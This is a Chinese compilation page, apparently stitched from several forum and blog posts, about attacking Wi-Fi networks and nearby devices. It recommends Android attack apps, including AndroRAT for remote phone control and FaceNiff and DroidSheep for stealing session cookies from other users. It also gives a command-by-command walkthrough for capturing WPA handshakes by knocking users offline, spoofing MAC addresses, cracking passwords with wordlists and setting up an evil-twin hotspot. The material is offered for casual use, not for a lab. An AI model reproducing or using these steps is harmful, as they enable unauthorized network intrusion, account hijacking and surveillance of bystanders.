本文目录一览:
求一个可以抓包的手机Wifi软件
刚刚在kali NetHunter app store上找到一款贼厉害的安卓系统抓包软件,名字叫 Hijacker
下载链接:去re.nethunter.com/re掉po/中com.hijacker_3文2.apk
软件简介:Hijacker是用于渗透测试工具Aircrack-ng,Airodump-ng,MDK3和Reaver的图形用户界面。 它提供了一个简单易用的UI来使用这些工具,而无需在控制台中键入命令并复制和粘贴MAC地址。
此应用程序需要具有支持监视器模式的内部无线适配器的ARM android设备。 少数android设备可以运行,但本机都不可用。 这意味着您将需要自定义固件。 任何使用BCM4339芯片组(MSM8974,例如Nexus 5,Xperia Z1 / Z2,LG G2,LG G Flex,三星Galaxy Note 3)的设备都可以与Nexmon(也支持其他一些芯片组)一起使用。 使用BCM4330的设备可以使用bcmon。
另一种选择是使用OTG电缆在Android中使用支持监视器模式的外部适配器。
从1.1版开始,包含了armv7l和aarch64设备所需的工具。 还包括用于BCM4339和BCM4358的Nexmon驱动程序和管理实用程序。
root访问也是必要的,因为这些工具需要root才能工作。
求攻击WiFi的软件
本人实属无聊,在网上找到了一些可以攻击同wifi环境下设备的软件,这些大家很可能都见过,所以不喜勿喷。。。
首先要root ,这个不强调了,其次你需要安装busybox BusyBox_Pro_Linux工具箱_9.9已付费版.apk (3.14 MB, 下载次数: 13669) 为了把握些,装吧。。。
然后就是攻击软件 DSploit汉化版.apk (6.35 MB, 下载次数: 25893) droidsheep_15.apk (265.26 KB, 下载次数: 7871) 后奉上。。 安卓抓包工具.apk (374.31 KB, 下载次数: 7042)
因为害怕自己攻击到别人后让人家反攻击所以又奉上防御软件两枚 wifi.apk (1.55 MB, 下载次数: 7992) droidsheep.guard.free_3.apk (178.48 KB, 下载次数: 5083)
以下均属转载。。。本人仅学生党一枚,能力有限,当然不是原创,至于东西好不好就这样了,管它呢,就是娱乐
2016 黑客必备的Android应用都有哪些
AndroRAT
AndroRAT一词源自Android与RAT(即远程管理工具)。这款顶级黑客工具已经拥有相当长的发展历史,而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统,同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此,如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。
这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控,进行手机呼叫与短信发送,通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。
github地址:AndroRAT
Hackode
Hackode是一款Android应用,其基本上属于一整套工具组合,主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中,我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。
通过这款应用,大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用,非常适合入门者作为起步工具且无需提供任何个人隐私信息。
下载地址:Hackode
zANTI
zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具,且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对网络环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境,并以此为基础检测多项恶意技术方案。
大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI,它就会映射整套网络并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。
应用当中的多种模块包括网络映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。
下载地址:zANTI
FaceNiff
FaceNiff是一款顶级Android黑客应用,允许大家拦截并嗅探WiFi网络流量。这款工具广泛适用于Android用户窥探他人的Facebook、Twitter以及其它社交媒体网站。这款在黑客群体中广受好评的工具能够从WiFi网络中窃取cookie,并为攻击者提供未经授权的、指向受害者账户的访问通道。
FaceNiff由Bartosz Ponurkiewicz开发完成——这位开发者同时也编写出了桌面黑客工具Firesheep for Firefox。
下载地址:FaceNiff
Droidsheep
Droidsheep是一款相当高效的黑客应用,主要作用是针对Wi-Fi网络执行安全性分析。这款应用能够劫持网络之上的Web会话,而且几乎适用于全部服务及网站。
在启动Droidsheep应用之后,它会利用一套路由机制对全部Wi-Fi网络流量进行监控与拦截,同时从活动会话当中提取概要信息。在这款应用的帮助下,我们将能够嗅探Facebook、领英、Twitter以及其它各类社交媒体账户。
DroidSheep Guard,该应用的另一个版本,能够帮助大家在网络之上检测各类ARP嗅探活动——包括由FaceNiff、Droidsheep以及其它软件实施的功能活动。
下载地址:Droidsheep
DroidBox
DroidBox是一款对Android应用进行动态分析的应用方案。在该应用的帮助下,大家可以获得极为广泛的分析结果,包括APK软件包、网络流量、短信与手机呼叫、通过不同通道获取泄露信息等等。
这款出色的Android黑客应用还使得我们能够对Android应用软件包的行为进行可视化处理。
下载地址:DroidBox
APKInspector
APKInspector应用允许大家执行逆向工程任务。在这款应用的帮助下,我们将获得图形功能与分析能力,从而对监控目标拥有更为深入的理解。这款强大的Android黑客工具能够帮助大家从任意Android应用当中获取源代码,并将DEX代码进行可视化以清除其中的信用与授权部分。
下载地址:APKInspector
Nmap
Nmap最具人气的网络扫描应用同时适用于Android操作系统。Nmap同时适用于未root与经过root之手机。如果大家身为新手Android黑客,那么这款黑客应用绝对不可或缺。
下载地址:Nmap
SSHDroid
SSHDroid是一款面向Android系统开发的SSH服务器实现方案,允许大家将自己的Android设备与PC相对接,同时运行“terminal”与“adb shell”等命令,甚至能够实现文件编辑。当我们与远程设备相连接,它还能够提供额外的安全保护机制。
这款应用提供了共享密钥验证、WiFi自动启动白名单以及扩展通知控制等功能。
下载地址:SSHDroid
*投稿作者:w85040,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)
5.无线渗透 wpa wifi 破解
Ess 人类可记忆 的名字(wifi名字)
Bss 无线ap 的mac地址
破解WiFi看下面 破解wpa
iwconfig
iw list
iw dev wlan0mon set channel 4 更改所在信道为4
iwlist wlan0mon channel 查看 wlan0mon 所在的信道 所在信道要与 要抓的信道在同一信道
iw dev wlan0 scan | grep SSID 扫描附 近的 ap (WiFi)
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" 可以筛选出在地基信道
iw dev wlan0 interface add wlan0mon type monitor 添加可以监听的网卡接口 注意wlan0, 是你自己的无线网卡 用 iwconfig 可以查看 可能是wlan1 或者 wlan2 之后就可以在 iwconfig 里看到 wlan0mon (如果看不到 尝试 关闭 service network-manager stop 服务) 然后使用 ifconfig wlan0mon 启动 ,之后就可以用wireshark 进行抓包
iw dev wlan0mon interface del 删除添加的网卡接口
service network-manager stop 首先先关闭 这个服务
airmon-ng check 可以检查出有可能冲突的进程
airmon-ng check kill 可以杀掉全部冲突进程
airmon-ng start wlan0 6 在wlan0上启动侦听 这个数字 6 就是启动在哪个信道上监听 可以不写 和上面iw的命令没有区别
iwlist wlan0mon channel 查看当前在第几信道
airmon-ng stop wlan0mon 关闭监听 然后再用 ifconfig wlan0 up 启动无线网卡 再使用 service network-manager start 进行服务启动 可以进行正常的使用
airodump-ng wlan0mon 抓包 默认抓取所有信道的 包 airodump-ng wlan0 -c 1 这个数字1 代表抓取1信道的包
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w filename.cap --ivs 后面这些 每一个都是可以省略的 --bssid 代表 只抓取这个 ap的包 -w 文件名 可以把抓到的包 保存成文件 --ivs 代表只抓 wep 加密的包
包注入 注意让自己和目标在同一信道
如果发包是 要伪造源地址 可以用 macchanger -m 00:11:22:33:44:55 wlan0mon 将自己的mac 地址 与要伪造的地址改成相同
aireplay-ng -9 wlan0mon 注包测试 如果不成功 可以运行 ifconfig wlan0mon up 试试
这时网络中会有两个相同mac 的设备 会有丢包
如果WiFi 只使用mac地址过滤没有密码你就可以连接上了,可以配合破解的WiFi密码 进行使用破解的WiFi密码 加上mac地址伪造连接有密码有mac绑定的 WiFi
比较简单 只要抓到足够多的包就能完全破解
思路 暴力破解
抓到一位用户的握手包
如果有用户已经连接上 可以使他断线重连 就能得到握手包(千万别傻等别人连接)
然后将大量的密码字典放进握手包里计算看看是不是对的密码 使用这种方式要用显卡跑会快很多,也可以去淘宝找人跑包
开启一个wifi热点
使用上面这个命令后 用 ifconfig -a 可以查看到 多出了一个网卡 叫 at0 下一步就是把at0 和 eth0 (就是连接外网的网卡 如果是用WiFi 就是wlan0 之类的) 桥接起来
apt-get install bridge-utils 桥接网卡工具包
桥接接口的 成员接口 就是eth0 和 at0 是不能有ip 地址的 所以分别使用
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
来启动这两个接口 IP地址是0.0.0.0
再使用
ifconfig bridge 192.168.1.10 up
给上面创建的桥接网卡 一个ip地址 并up起来 这个IP地址 使用 上面eth0 的IP地址
添加一个网关 目的是让 连接到黑客开启的WiFi 的用户可以直接到现实路由中 获取ip地址
netstat -nr
route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
启动IP 转发
echo 1 /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 确认修改完成
git clone
cd 3vilTwinAttacker
chmod +x installer.sh
./installer.sh --install
这样就安装成功了
启动工具使用
wifi-pumpkin 不是之前的3vilTwinAttacker 看最后安装完成的命令行 红色的字 执行这个命令 在终端